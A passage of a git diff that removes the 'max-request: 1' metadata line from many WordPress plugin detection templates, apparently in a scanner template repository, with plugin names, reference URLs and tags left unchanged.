-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec077..9555d7aebd 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a5279..180266f448 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
